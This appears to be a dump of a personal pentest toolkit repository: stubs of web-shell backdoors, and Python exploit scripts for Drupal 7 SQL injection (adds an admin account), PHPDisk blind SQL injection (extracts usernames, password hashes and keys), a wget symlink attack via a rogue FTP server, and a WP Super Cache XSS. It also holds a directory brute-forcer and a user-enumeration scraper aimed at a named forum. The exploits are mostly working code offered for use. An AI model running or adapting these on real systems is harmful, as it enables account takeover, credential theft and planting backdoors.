├── README.md
├── backdoor
├── array_map.php
├── cmd.cfm
├── sql.cfm
└── uploader.php
├── exploit
├── drupal-7-x-sqli.py
├── phpdisk-sql-injection.py
├── wget-symlink_attack_exploit.py
└── wp-super-cache-xss-exploit.py
├── fuzzing
├── cutescan.py
├── dz.py
├── php-enable_functions-enumeration-script.php
└── rsync.py
├── misc
├── Reverse Shell.c
├── YMssql.cpp
├── burp_captcha_crack.py
├── gettitle.py
├── google.php
├── mssql-sql-inject-execute.py
├── php-ftp.php
├── proxy.asp
├── proxy.cfm
├── proxy.jsp
├── proxy.php
├── rsync.py
├── security-bulletins.list
├── ssltest.py
└── tasklist.vbs
├── note
├── audit-log.md
├── linux.txt
├── oracle.md
├── windows.txt
└── zgrab_1.md
└── project
├── device_mode_toggle
├── @devicemodetoggle-1.0.0.xpi
├── README.md
├── data
│ ├── icon-16.png
│ ├── icon-32.png
│ ├── icon-48.png
│ └── icon-64.png
├── index.js
├── package.json
└── test
│ └── test-index.js
├── diy_cloudplay
├── g.smali
├── readme.md
└── y2c.php
└── wgetex
├── WgetEx.Asm
├── WgetEx.exe
├── macros.asm
└── readme.txt
/README.md:
--------------------------------------------------------------------------------
1 | pentest
2 | =======
3 |
4 | some pentest scripts & tools by yaseng@uauc.net
5 |
6 |
7 |
8 | www.yaseng.me
9 | www.c0deplay.com
10 | team.f4ck.net
11 | www.90sec.org
12 |
13 | _____ _ _
14 | | _ | | | | |
15 | ___| |/' | __| | ___ _ __ | | __ _ _ _
16 | / __| /| |/ _` |/ _ \ '_ \| |/ _` | | | |
17 | | (__\ |_/ / (_| | __/ |_) | | (_| | |_| |
18 | \___|\___/ \__,_|\___| .__/|_|\__,_|\__, |
19 | | | __/ |
20 | |_| |___/
21 |
22 | ├─backdoor
23 | ├─exploit
24 | ├─fuzzing
25 | ├─lab
26 | └─misc
27 |
28 |
29 |
--------------------------------------------------------------------------------
/backdoor/array_map.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/backdoor/cmd.cfm:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
7 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 | #O#
27 |
28 |
29 |
30 |
31 |
--------------------------------------------------------------------------------
/backdoor/sql.cfm:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 | #preserveSingleQuotes(sql_cmds)#
10 |
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/backdoor/uploader.php:
--------------------------------------------------------------------------------
1 |
5 |
14 |
--------------------------------------------------------------------------------
/exploit/drupal-7-x-sqli.py:
--------------------------------------------------------------------------------
1 | #@name drupal-7-x-sqli.py
2 | #@author Yaseng
3 | #@desc Add a Drupal administrator account, compatibility table prefix such as test_users
4 | #@exp drupal-7-x-sqli.py http://127.0.0.1/cms/drupal/drupal/ testss 4343
5 | import urllib2,sys
6 |
7 | def post(url,data,cookie=""):
8 | try:
9 | opener = urllib2.build_opener()
10 | opener.addheaders.append(('Cookie', cookie))
11 | r = opener.open(url,data,timeout=60)
12 | return r.read();
13 | except urllib2.HTTPError, error:
14 | print error
15 | return error.read()
16 |
17 |
18 |
19 | if __name__ == '__main__':
20 | if len(sys.argv) > 3 :
21 | url=sys.argv[1]
22 | username=sys.argv[2]
23 | id=sys.argv[3]
24 | poc1="values+(%s,'%s" % (id,username)
25 | poc2="values(%s,3)" % id
26 | exploit="name[0%20;insert+into+{users}+(uid,name,pass,status)+"+poc1+"','$S$DrxHxKj6w11uEr04c1mBk.zeoEDoVgklllN2A3AOOJvooOfiqn9Y',1);insert+into+{users_roles}+(uid,rid)+"+poc2+";#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Login"
27 | post(url,exploit)
28 |
29 | else:
30 | print "Usage drupal-7-x-sqli.py url username id \r\n "
31 |
--------------------------------------------------------------------------------
/exploit/phpdisk-sql-injection.py:
--------------------------------------------------------------------------------
1 | #===============================================================================
2 | # Id :phpdisk.y
3 | # Author:Yaseng
4 | #===============================================================================
5 | import sys, urllib2, time, os , Queue, msvcrt, threading,re,base64,md5,hashlib,binascii,cookielib
6 |
7 |
8 |
9 |
10 | def cslogo():
11 | print '''
12 | ___ ___ ____ ____ ____ __ __ _ _
13 | / __)/ _ \( _ \( ___)( _ \( ) /__\ ( \/ )
14 | ( (__( (_) ))(_) ))__) )___/ )(__ /(__)\ \ /
15 | \___)\___/(____/(____)(__) (____)(__)(__)(__)
16 | Name:phpdisk bind sql injection exploit
17 | Author:Yaseng [yaseng@uauc.net]
18 | Usage:phpdisk.py site[www.yaseng.me] id[1]
19 | '''
20 |
21 | # show message
22 | def msg(text, type=0):
23 | if type == 0:
24 | str_def = "[*]"
25 | elif type == 1:
26 | str_def = "[+]"
27 | else:
28 | str_def = "[-]";
29 | print str_def + text;
30 |
31 |
32 |
33 | # get url data
34 | def get_data(url):
35 | try:
36 | r = urllib2.urlopen(url, timeout=10)
37 | return r.read()
38 | except :
39 | return 0
40 | def b(url):
41 | if get_data(url).find("ssport Err",0) != -1 :
42 | return 0
43 | return 1
44 |
45 | def make_plyload(payload):
46 | return target+"?"+base64.b64encode("username=1&password=1&action=passportlogin&tpf="+payload+"&sign="+md5.new("passportlogin"+"1"+"1").hexdigest().upper())
47 |
48 | def get_username():
49 |
50 | msg("get username ...")
51 | global pass_list
52 | len=0
53 | for i in range(40) :
54 | if b(make_plyload("pd_users WHERE 1 and (SELECT LENGTH(username) from pd_users where userid=%d )= %d #" % (uid,i))):
55 | len=i
56 | msg("username length:%d" % len,1)
57 | break
58 | global key_list
59 | key_list=['0','1','2','3','4','5','6','7','8','9']
60 | key_list+=map(chr,range(97,123))
61 | username=""
62 | for i in range(len) :
63 | for key in key_list :
64 | t=key
65 | if type(key) != int :
66 | t="0x"+binascii.hexlify(key)
67 | if(b(make_plyload(" pd_users WHERE 1 and (SELECT substr(username,%d,1) from pd_users where userid=%d )=%s #" % (i+1,uid,t)))) :
68 | msg("username [%d]:%s" % (i+1,key))
69 | username+=key
70 | break
71 | msg("username:"+username,1)
72 | return username
73 |
74 |
75 |
76 | def get_password():
77 |
78 |
79 | pass_list=['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f']
80 | password=""
81 | for i in range(32) :
82 | for key in pass_list :
83 | t=key
84 | if type(key) != int :
85 | t="0x"+binascii.hexlify(key)
86 | if(b(make_plyload(" pd_users WHERE 1 and (SELECT substr(password,%d,1) from pd_users where userid=%d )= %s #" % (i+1,uid,t)))) :
87 | msg("password [%d]:%s" % (i+1,key))
88 | password+=key
89 | break
90 | msg("username:"+password,1)
91 | return password
92 |
93 | def get_encrypt_key():
94 |
95 | msg("get encrypt_key ...")
96 | global pass_list
97 | pass_list=map(chr,range(97,123))
98 | len=0
99 | for i in range(40) :
100 | if b(make_plyload("pd_users WHERE 1 and ( SELECT LENGTH(value) from pd_settings where vars=0x656e63727970745f6b6579 )=%d #23" % i)):
101 | len=i
102 | msg("encrypt_key length:%d" % len,1)
103 | break
104 | global key_list
105 | key_list=['0','1','2','3','4','5','6','7','8','9']
106 | key_list+=map(chr,range(65,91)+range(97,123))
107 | encrypt_key=""
108 | for i in range(len) :
109 | for key in key_list :
110 | t=key
111 | if type(key) != int :
112 | t="0x"+binascii.hexlify(key)
113 | if(b(make_plyload(" pd_users WHERE 1 and ( SELECT binary(substr(value,%d,1)) from pd_settings where vars=0x656e63727970745f6b6579 ) = %s #" % (i+1,t)))) :
114 | msg("key [%d]:%s" % (i+1,key))
115 | encrypt_key+=key
116 | break
117 | msg("encrypt_key:"+encrypt_key,1)
118 | return encrypt_key
119 |
120 |
121 |
122 | if __name__ == '__main__':
123 |
124 | cslogo()
125 | if len(sys.argv) > 1 :
126 | site=sys.argv[1];
127 | global target
128 | global uid
129 | try :
130 | uid=int(sys.argv[2]);
131 | except :
132 | uid =1
133 | target=site+"/plugins/phpdisk_client/passport.php"
134 | msg("exploit:"+site)
135 | #print get_data(make_plyload(" pd_users WHERE 1 and ( SELECT substr(value,2,1) from pd_settings where vars=0x656e63727970745f6b6579 ) = 9 %23"))
136 | if get_data(target) :
137 | username=get_username()
138 | if len(username) > 0 :
139 | password=get_password()
140 | if len(password) == 32 :
141 | msg("Succeed: username:%s password:%s" % (username,password),1)
142 | else :
143 | msg("vulnerability not exits",2);
144 | exit();
145 |
146 |
147 |
148 |
149 |
150 |
--------------------------------------------------------------------------------
/exploit/wget-symlink_attack_exploit.py:
--------------------------------------------------------------------------------
1 | #@name wget-symlink_attack_exploit.py
2 | #@author Yaseng
3 | #@desc server:python wget-symlink_attack_exploit.py wget client: wget -m ftp://127.0.0.1
4 | import socket, threading, os, sys, time
5 | import hashlib, platform, stat
6 |
7 | listen_ip = "127.0.0.1"
8 | listen_port = 21
9 | conn_list = []
10 | root_dir = "./home"
11 | max_connections = 500
12 | conn_timeout = 120
13 |
14 |
15 | class FtpConnection(threading.Thread):
16 | def __init__(self, fd):
17 | threading.Thread.__init__(self)
18 | self.fd = fd
19 | self.running = True
20 | self.setDaemon(True)
21 | self.alive_time = time.time()
22 | self.option_utf8 = False
23 | self.identified = False
24 | self.option_pasv = True
25 | self.username = ""
26 | def process(self, cmd, arg):
27 | cmd = cmd.upper();
28 | if self.option_utf8:
29 | arg = unicode(arg, "utf8").encode(sys.getfilesystemencoding())
30 | print "<<", cmd, arg, self.fd
31 | # Ftp Command
32 | if cmd == "BYE" or cmd == "QUIT":
33 | if os.path.exists(root_dir + "/xxftp.goodbye"):
34 | self.message(221, open(root_dir + "/xxftp.goodbye").read())
35 | else:
36 | self.message(221, "Bye!")
37 | self.running = False
38 | return
39 | elif cmd == "USER":
40 | # Set Anonymous User
41 | if arg == "": arg = "anonymous"
42 | for c in arg:
43 | if not c.isalpha() and not c.isdigit() and c != "_":
44 | self.message(530, "Incorrect username.")
45 | return
46 | self.username = arg
47 | self.home_dir = root_dir + "/" + self.username
48 | self.curr_dir = "/"
49 | self.curr_dir, self.full_path, permission, self.vdir_list, \
50 | limit_size, is_virtual = self.parse_path("/")
51 |
52 | self.identified = True
53 | self.message(230, "Identified!")
54 | return
55 | elif cmd == "PASS":
56 | if open(self.pass_path).read() == hashlib.md5(arg).hexdigest():
57 | self.message(230, "Identified!")
58 | self.identified = True
59 | else:
60 | self.message(530, "Not identified!")
61 | self.identified = False
62 | return
63 | elif not self.identified:
64 | self.message(530, "Please login with USER and PASS.")
65 | return
66 |
67 | self.alive_time = time.time()
68 | finish = True
69 | if cmd == "NOOP":
70 | self.message(200, "ok")
71 | elif cmd == "TYPE":
72 | self.message(200, "ok")
73 | elif cmd == "SYST":
74 | self.message(200, "UNIX")
75 | elif cmd == "EPSV" or cmd == "PASV":
76 | self.option_pasv = True
77 | try:
78 | self.data_fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
79 | self.data_fd.bind((listen_ip, 0))
80 | self.data_fd.listen(1)
81 | ip, port = self.data_fd.getsockname()
82 | if cmd == "EPSV":
83 | self.message(229, "Entering Extended Passive Mode (|||" + str(port) + "|)")
84 | else:
85 | ipnum = socket.inet_aton(ip)
86 | self.message(227, "Entering Passive Mode (%s,%u,%u)." %
87 | (",".join(ip.split(".")), (port >> 8 & 0xff), (port & 0xff)))
88 | except:
89 | self.message(500, "failed to create data socket.")
90 | elif cmd == "EPRT":
91 | self.message(500, "implement EPRT later...")
92 | elif cmd == "PORT":
93 | self.option_pasv = False
94 | self.data_fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
95 | s = arg.split(",")
96 | self.data_ip = ".".join(s[:4])
97 | self.data_port = int(s[4]) * 256 + int(s[5])
98 | self.message(200, "ok")
99 | elif cmd == "PWD" or cmd == "XPWD":
100 | if self.curr_dir == "": self.curr_dir = "/"
101 | self.message(257, '"' + self.curr_dir + '"')
102 | elif cmd == "LIST" or cmd == "NLST":
103 | if arg != "" and arg[0] == "-": arg = ""
104 | if self.curr_dir.find("aked") > 0 :
105 | buf="-rwx------ 1 root root 21 Aug 29 2013 pwned\r\n"
106 | else:
107 | buf = "lrwxrwxrwx 1 root root 33 Oct 11 2013 fakedir -> /tmp\r\n"
108 | buf += "drwxrwxr-x 15 root root 4096 Oct 11 2013 fakedir\r\n"
109 | poc = "total \r\n" + buf
110 | poc = unicode(poc, sys.getfilesystemencoding()).encode("utf8")
111 | self.message(150, "Opening ASCII mode data connection for /bin/ls\r\n")
112 | self.establish()
113 | self.data_fd.send(poc)
114 |
115 | # self.data_fd.send("xx")
116 | self.message(226, " Transfer complete.\r\n")
117 | self.data_fd.close()
118 | self.data_fd = 0
119 |
120 |
121 | elif cmd == "REST":
122 | self.file_pos = int(arg)
123 | self.message(250, "ok")
124 | elif cmd == "FEAT":
125 | features = "211-Features:\r\nSITES\r\nEPRT\r\nEPSV\r\nMDTM\r\nPASV\r\n"\
126 | "REST STREAM\r\nSIZE\r\nUTF8\r\n211 End\r\n"
127 | self.fd.send(features)
128 | elif cmd == "OPTS":
129 | arg = arg.upper()
130 | if arg == "UTF8 ON":
131 | self.option_utf8 = True
132 | self.message(200, "ok")
133 | elif arg == "UTF8 OFF":
134 | self.option_utf8 = False
135 | self.message(200, "ok")
136 | else:
137 | self.message(500, "unrecognized option")
138 | elif cmd == "CDUP":
139 | finish = False
140 | arg = ".."
141 | else:
142 | finish = False
143 | if finish: return
144 | # Parse argument ( It's a path )
145 | if arg == "":
146 | self.message(500, "where's my argument?")
147 | return
148 | remote, local, permission, vdir_list, limit_size, is_virtual = \
149 | self.parse_path(arg)
150 | # can not do anything to virtual directory
151 | if is_virtual: permission = "none"
152 | can_read, can_write, can_modify = "read" in permission, "write" in permission, "modify" in permission
153 | newpath = local
154 | try:
155 | if cmd == "CWD":
156 | if 1:
157 | self.curr_dir = remote
158 | self.full_path = newpath
159 | self.message(250, '"' + remote + '"')
160 | else:
161 | self.message(550, "failed")
162 | elif cmd == "MDTM":
163 | if os.path.exists(newpath):
164 | self.message(213, time.strftime("%Y%m%d%I%M%S", time.localtime(
165 | os.path.getmtime(newpath))))
166 | else:
167 | self.message(550, "failed")
168 | elif cmd == "SIZE":
169 | self.message(231, os.path.getsize(newpath))
170 | elif cmd == "XMKD" or cmd == "MKD":
171 | if not can_modify:
172 | self.message(550, "permission denied.")
173 | return
174 | os.mkdir(newpath)
175 | self.message(250, "ok")
176 | elif cmd == "RNFR":
177 | if not can_modify:
178 | self.message(550, "permission denied.")
179 | return
180 | self.temp_path = newpath
181 | self.message(350, "rename from " + remote)
182 | elif cmd == "RNTO":
183 | os.rename(self.temp_path, newpath)
184 | self.message(250, "RNTO to " + remote)
185 | elif cmd == "XRMD" or cmd == "RMD":
186 | if not can_modify:
187 | self.message(550, "permission denied.")
188 | return
189 | os.rmdir(newpath)
190 | self.message(250, "ok")
191 | elif cmd == "DELE":
192 | if not can_modify:
193 | self.message(550, "permission denied.")
194 | return
195 | os.remove(newpath)
196 | self.message(250, "ok")
197 | elif cmd == "RETR":
198 | self.establish()
199 | #data="hello"
200 | self.message(150, "ok")
201 | f = open("1.txt", "rb")
202 | data = f.read(8192)
203 | f.close()
204 | self.data_fd.send(data)
205 | self.data_fd.close()
206 | self.data_fd = 0
207 | self.message(226, "ok")
208 | elif cmd == "STOR" or cmd == "APPE":
209 | if not can_write:
210 | self.message(550, "permission denied.")
211 | return
212 | if os.path.exists(newpath) and not can_modify:
213 | self.message(550, "permission denied.")
214 | return
215 | # Check space size remained!
216 | used_size = 0
217 | if limit_size > 0:
218 | used_size = self.get_dir_size(os.path.dirname(newpath))
219 | if not self.establish(): return
220 | self.message(150, "ok")
221 | f = open(newpath, ("ab" if cmd == "APPE" else "wb"))
222 | while self.running:
223 | self.alive_time = time.time()
224 | data = self.data_fd.recv(8192)
225 | if len(data) == 0: break
226 | if limit_size > 0:
227 | used_size = used_size + len(data)
228 | if used_size > limit_size: break
229 | f.write(data)
230 | f.close()
231 | self.data_fd.close()
232 | self.data_fd = 0
233 | if limit_size > 0 and used_size > limit_size:
234 | self.message(550, "Exceeding user space limit: " + str(limit_size) + " bytes")
235 | else:
236 | self.message(226, "ok")
237 | else:
238 | self.message(500, cmd + " not implemented")
239 | except:
240 | self.message(550, "failed.")
241 |
242 | def establish(self):
243 | if self.data_fd == 0:
244 | self.message(500, "no data connection")
245 | return False
246 | if self.option_pasv:
247 | fd = self.data_fd.accept()[0]
248 | self.data_fd.close()
249 | self.data_fd = fd
250 | else:
251 | try:
252 | self.data_fd.connect((self.data_ip, self.data_port))
253 | except:
254 | self.message(500, "failed to establish data connection")
255 | return False
256 | return True
257 |
258 | def read_virtual(self, path):
259 | vdir_list = []
260 | path = path + "/.xxftp/virtual"
261 | if os.path.isfile(path):
262 | for v in open(path, "r").readlines():
263 | items = v.split()
264 | items[1] = items[1].replace("$root", root_dir)
265 | vdir_list.append(items)
266 | return vdir_list
267 |
268 | def get_dir_size(self, folder):
269 | size = 0
270 | for path, dirs, files in os.walk(folder):
271 | for f in files:
272 | size += os.path.getsize(os.path.join(path, f))
273 | return size
274 |
275 | def read_size(self, path):
276 | size = 0
277 | path = path + "/.xxftp/size"
278 | if os.path.isfile(path):
279 | size = int(open(path, "r").readline())
280 | return size
281 |
282 | def read_permission(self, path):
283 | permission = "read,write,modify"
284 | path = path + "/.xxftp/permission"
285 | if os.path.isfile(path):
286 | permission = open(path, "r").readline()
287 | return permission
288 |
289 | def parse_path(self, path):
290 | if path == "": path = "."
291 | if path[0] != "/":
292 | path = self.curr_dir + "/" + path
293 | s = os.path.normpath(path).replace("\\", "/").split("/")
294 | local = self.home_dir
295 | # reset directory permission
296 | vdir_list = self.read_virtual(local)
297 | limit_size = self.read_size(local)
298 | permission = self.read_permission(local)
299 | remote = ""
300 | is_virtual = False
301 | for name in s:
302 | name = name.lstrip(".")
303 | if name == "": continue
304 | remote = remote + "/" + name
305 | is_virtual = False
306 | for v in vdir_list:
307 | if v[0] == name:
308 | permission = v[2]
309 | local = v[1]
310 | limit_size = self.read_size(local)
311 | is_virtual = True
312 | if not is_virtual: local = local + "/" + name
313 | vdir_list = self.read_virtual(local)
314 | return (remote, local, permission, vdir_list, limit_size, is_virtual)
315 |
316 | def run(self):
317 | ''' Connection Process '''
318 | try:
319 | if len(conn_list) > max_connections:
320 | self.message(500, "too many connections!")
321 | self.fd.close()
322 | self.running = False
323 | return
324 | self.message(220, "exploiting")
325 | # Command Loop
326 | line = ""
327 | while self.running:
328 | data = self.fd.recv(4096)
329 | if len(data) == 0: break
330 | line += data
331 | if line[-2:] != "\r\n": continue
332 | line = line[:-2]
333 | space = line.find(" ")
334 | if space == -1:
335 | self.process(line, "")
336 | else:
337 | self.process(line[:space], line[space + 1:])
338 | line = ""
339 | except:
340 | print "error", sys.exc_info()
341 | self.running = False
342 | self.fd.close()
343 | print "connection end", self.fd, "user", self.username
344 |
345 | def message(self, code, s):
346 | ''' Send Ftp Message '''
347 | s = str(s).replace("\r", "")
348 | ss = s.split("\n")
349 | if len(ss) > 1:
350 | r = (str(code) + "-") + ("\r\n" + str(code) + "-").join(ss[:-1])
351 | r += "\r\n" + str(code) + " " + ss[-1] + "\r\n"
352 | else:
353 | r = str(code) + " " + ss[0] + "\r\n"
354 | if self.option_utf8:
355 | r = unicode(r, sys.getfilesystemencoding()).encode("utf8")
356 | self.fd.send(r)
357 |
358 | def server_listen():
359 | global conn_list
360 | global list_count
361 | list_coun=1
362 | listen_fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
363 | listen_fd.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
364 | listen_fd.bind((listen_ip, listen_port))
365 | listen_fd.listen(1024)
366 | conn_lock = threading.Lock()
367 | print "ftpd is listening on ", listen_ip + ":" + str(listen_port)
368 |
369 | while True:
370 | conn_fd, remote_addr = listen_fd.accept()
371 | print "connection from ", remote_addr, "conn_list", len(conn_list)
372 | conn = FtpConnection(conn_fd)
373 | conn.start()
374 |
375 | conn_lock.acquire()
376 | conn_list.append(conn)
377 | # check timeout
378 | try:
379 | curr_time = time.time()
380 | for conn in conn_list:
381 | if int(curr_time - conn.alive_time) > conn_timeout:
382 | if conn.running == True:
383 | conn.fd.shutdown(socket.SHUT_RDWR)
384 | conn.running = False
385 | conn_list = [conn for conn in conn_list if conn.running]
386 | except:
387 | print sys.exc_info()
388 | conn_lock.release()
389 |
390 |
391 | def main():
392 | server_listen()
393 |
394 | if __name__ == "__main__":
395 | main()
396 |
--------------------------------------------------------------------------------
/exploit/wp-super-cache-xss-exploit.py:
--------------------------------------------------------------------------------
1 | #@name wp-super-cache-xss-exploit.py
2 | #@author Yaseng
3 | #@team Baidu X-Team
4 | #@link https://blog.sucuri.net/2015/04/security-advisory-persistent-xss-in-wp-super-cache.html
5 | #@exp wp-super-cache-xss-exploit.py http://127.0.0.1/cms/wordpress
6 |
7 |
8 | import urllib2,sys,time,hashlib
9 |
10 | def get(url,cookie=""):
11 | try:
12 | opener = urllib2.build_opener()
13 | opener.addheaders.append(('Cookie', cookie))
14 | opener.addheaders.append(('Referer', url))
15 | r = opener.open(url,timeout=60)
16 | return r.read();
17 | except urllib2.HTTPError, error:
18 | print error.read()
19 | return error.read()
20 |
21 |
22 | if __name__ == '__main__':
23 | if len(sys.argv) > 1 :
24 | poc=" "
25 | #a new administrator account to the site, injecting backdoors by using WordPress theme edition tools, etc.
26 | url=sys.argv[1]
27 | rand_str=hashlib.md5(str(time.time())).hexdigest()
28 | cookie="comment_author_url_"+rand_str+"="+poc+rand_str
29 | #print cookie
30 | get(url,cookie)
31 | else:
32 | print "Usage: wp-super-cache-xss-exploit.py uri \r\n "
33 |
--------------------------------------------------------------------------------
/fuzzing/cutescan.py:
--------------------------------------------------------------------------------
1 | #===============================================================================
2 | # Id :cutescan.y
3 | # Author:Yaseng
4 | #===============================================================================
5 | import sys, urllib2, time, os , Queue, msvcrt, threading,re
6 | from json import scanner
7 |
8 |
9 |
10 | def cslogo():
11 | print '''
12 | ,--^----------,--------,-----,-------^--,
13 | | ||||||||| `--------' | O ..
14 | `+---------------------------^----------|
15 | `\_,-------, ___@ PlayWeb ______|
16 | / XXXXXX /`| /
17 | / XXXXXX / `\ /
18 | / XXXXXX /\______(
19 | / XXXXXX /
20 | / XXXXXX /
21 | (________( For example:
22 | `------' cutescan.py yaseng.me
23 |
24 | '''
25 |
26 | # show message
27 | def msg(text, type=0):
28 | if type == 0:
29 | str_def = "[*]"
30 | elif type == 1:
31 | str_def = "[+]"
32 | else:
33 | str_def = "[-]";
34 | print str_def + text;
35 |
36 | # readfile to array
37 | def file_to_arr(file):
38 | arr=[]
39 | f = open(file)
40 | for line in f:
41 | arr.append(line.strip())
42 | return arr
43 |
44 |
45 | class ThreadGetKey(threading.Thread):
46 | def run(self):
47 | try:
48 | chr = msvcrt.getch()
49 | if chr == 'q':
50 | print "stopped by your action ( q )"
51 | os._exit(1)
52 | except:
53 | os._exit(1)
54 |
55 | def cutescan(host):
56 | msg("Cutescan :" + host)
57 | path_list1 = file_to_arr("data\\path1.txt")
58 | path_list2 = file_to_arr("data\\path2.txt")
59 | suffix_list= file_to_arr("data\\suffix.txt")
60 | # Compile the dictionary
61 | path_list1+=compile_domain(host)
62 | global file_queue
63 | global path_list
64 | global url_list
65 | global g_error_page_size
66 | path_list = []
67 | url_list=[]
68 | file_queue = Queue.Queue()
69 | g_error_page_size=error_page_szie("http://"+host)
70 | for path2 in path_list2 :
71 | if len(path2) > 0:
72 | path_list.append(path2)
73 | for path1 in path_list1 :
74 | path_list.append(path1 + path2 );
75 | #print path_list
76 | scandir("http://" + host+"/")
77 | url_list.insert(0,"http://" + host+"/")
78 | for url in url_list:
79 | for path in path_list :
80 | for suffix in suffix_list :
81 | file_queue.put(url + path+"." + suffix)
82 | msg("Target:%s %d available path found %d url list compiled " % (host,len(url_list),file_queue.qsize()),1)
83 | for i in range(30):
84 | Scaner().start()
85 |
86 | def scandir(curl):
87 | for path in path_list :
88 | url = curl + path + "/"
89 | #msg(url)
90 | try:
91 | r = urllib2.urlopen(url, timeout=10)
92 | size = dict(r.headers).get('content-length', 0)
93 | if g_error_page_size != size :
94 | msg("Path:" + url + " --->%d" % r.getcode(), 1);
95 | url_list.append(url)
96 | #scandir(url+"/") # Recursive fuzz path
97 | else :
98 | continue
99 | except urllib2.HTTPError as hr:
100 | # msg("Path:"+url+" --->%d" % hr.code,2);
101 | if(hr.code == 403) :
102 | url_list.append(url)
103 | scandir(url+"/")
104 | continue
105 |
106 | # compile domain to path_list exp : pentest.yaseng.com.cn => ['pentest.yaseng.com.cn', 'yaseng.com.cn', 'pentest', 'yaseng']
107 | def compile_domain(domain):
108 | path_list = []
109 | url_re = re.compile('.(com|net|org|cc|gov|edu|cn|me|info|hk|tv|asia).*') # top domain ....
110 | rq=url_re.search(domain);
111 | if rq is None :
112 | return []
113 | ret = url_re.sub('', domain)
114 | domain_arr = ret.split('.')
115 | path_list.append(domain)
116 | domain_len=len(domain_arr)
117 | if domain_len > 0 :
118 | if domain_len > 1 :
119 | path_list.append(domain_arr[domain_len-1]+rq.group())
120 | path_list+=domain_arr
121 | return path_list
122 |
123 | def error_page_szie(domain):
124 | try:
125 | ret=urllib2.urlopen(domain+"/cutescan9527.html", timeout=10)
126 | except :
127 | return 0
128 | return dict(ret.headers).get('content-length', 0)
129 |
130 | class Scaner(threading.Thread):
131 | def __init__(self):
132 | threading.Thread.__init__(self)
133 | def run(self):
134 | while 1:
135 | if file_queue.empty() == True:
136 | break
137 | url = str(file_queue.get())
138 | rfile=""
139 |
140 | try:
141 | #msg(url)
142 | rfile = urllib2.urlopen(url, timeout=10)
143 | size = dict(rfile.headers).get('content-length', 0)
144 | if g_error_page_size != size :
145 | msg("File %s found !!! Type:%s Size: %.4f m" % (url, rfile.headers['Content-Type'], float(size) / (1024 * 1024)) , 1);
146 | else :
147 | continue
148 | except :
149 | continue
150 |
151 |
152 | if __name__ == '__main__':
153 |
154 | cslogo()
155 | if len(sys.argv) > 1 :
156 | site_arr=file_to_arr(sys.argv[1]);
157 | for site in site_arr :
158 | try :
159 | urllib2.urlopen("http://"+site, timeout=10)
160 | cutescan(site)
161 | except :
162 | msg(site+" look unavailable ")
163 | continue
164 |
165 |
166 |
167 |
168 |
169 |
170 |
--------------------------------------------------------------------------------
/fuzzing/dz.py:
--------------------------------------------------------------------------------
1 | #===============================================================================
2 | # Id :phpdisk.y
3 | # Author:Yaseng
4 | #===============================================================================
5 | import sys, urllib2, time, os , Queue, msvcrt, threading,re,base64,md5,hashlib,binascii,cookielib
6 |
7 |
8 |
9 |
10 | def dzlogo():
11 | print '''
12 | ___ ___ ____ ____ ____ __ __ _ _
13 | / __)/ _ \( _ \( ___)( _ \( ) /__\ ( \/ )
14 | ( (__( (_) ))(_) ))__) )___/ )(__ /(__)\ \ /
15 | \___)\___/(____/(____)(__) (____)(__)(__)(__)
16 | Name:discuz account exploit
17 | Author:Yaseng [yaseng@uauc.net]
18 | Usage:dz.py site[www.yaseng.me] id[1]
19 | '''
20 | # show message
21 | def msg(text, type=0):
22 | if type == 0:
23 | str_def = "[*]"
24 | elif type == 1:
25 | str_def = "[+]"
26 | else:
27 | str_def = "[-]";
28 | print str_def + text;
29 |
30 | class ThreadGetKey(threading.Thread):
31 | def run(self):
32 | try:
33 | chr = msvcrt.getch()
34 | if chr == 'q':
35 | print "stopped by your action ( q )"
36 | os._exit(1)
37 | except:
38 | os._exit(1)
39 |
40 | # get url data
41 | def get_data(url):
42 | try:
43 | r = urllib2.urlopen(url, timeout=10)
44 | return r.read()
45 | except :
46 | return 0
47 |
48 |
49 | # readfile to array
50 | def file_to_arr(file):
51 | arr=[]
52 | f = open(file)
53 | for line in f:
54 | arr.append(line.strip())
55 | return arr
56 |
57 | def get_user(id):
58 | udata=get_data('http://home.rapidbbs.cn/home.php?uid=%d' % id)
59 | url_re = re.compile('home.php\?mod=space&uid=%d">(.*)' % id)
60 | try:
61 | rq=url_re.findall(udata) #match
62 | return rq[1]
63 | except :
64 | return 'no--'
65 |
66 | class Scaner(threading.Thread):
67 | def __init__(self):
68 | threading.Thread.__init__(self)
69 | def run(self):
70 | while 1:
71 | if id_queue.empty() == True:
72 | break
73 | uid=id_queue.get()
74 | username=get_user(uid)
75 | if username !='no--' :
76 | msg("%d:%s" % (uid,username),1)
77 | fuserlist.write(username+"\n")
78 |
79 | if __name__ == '__main__':
80 | dzlogo()
81 | #print get_user(3)
82 | #exit()
83 | global id_queue
84 | id_queue = Queue.Queue()
85 | for id in map(int,range(1,1181565)):
86 | id_queue.put(id)
87 | fuserlist = open("userlist.txt",'a')
88 | for i in range(100):
89 | Scaner().start()
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
--------------------------------------------------------------------------------
/fuzzing/php-enable_functions-enumeration-script.php:
--------------------------------------------------------------------------------
1 |
2 | $func enable",1);
15 |
16 | }
17 | }
18 |
19 |
20 | }else{
21 |
22 | msg("disable_functions none !!!",1);
23 |
24 | }
25 |
26 | function msg($text,$type=0){
27 |
28 | $def="[*]";
29 | $color="green";
30 | if($type ==1){
31 |
32 | $def="[+]" ;
33 | $color="red";
34 | }else if ($type==-1){
35 |
36 | $def="[-]";
37 | }
38 | echo "$def $text
";
39 |
40 | }
41 |
42 |
43 |
44 |
45 |
46 | ?>
--------------------------------------------------------------------------------
/fuzzing/rsync.py:
--------------------------------------------------------------------------------
1 |
2 | from common import *
3 | import sys, socket, time, os, subprocess, Queue
4 | from subprocess import *
5 | from lib.ThreadGetKey import *
6 |
7 |
8 | NORMAL = 0
9 | ERROR = 1
10 | TIMEOUT = 5
11 |
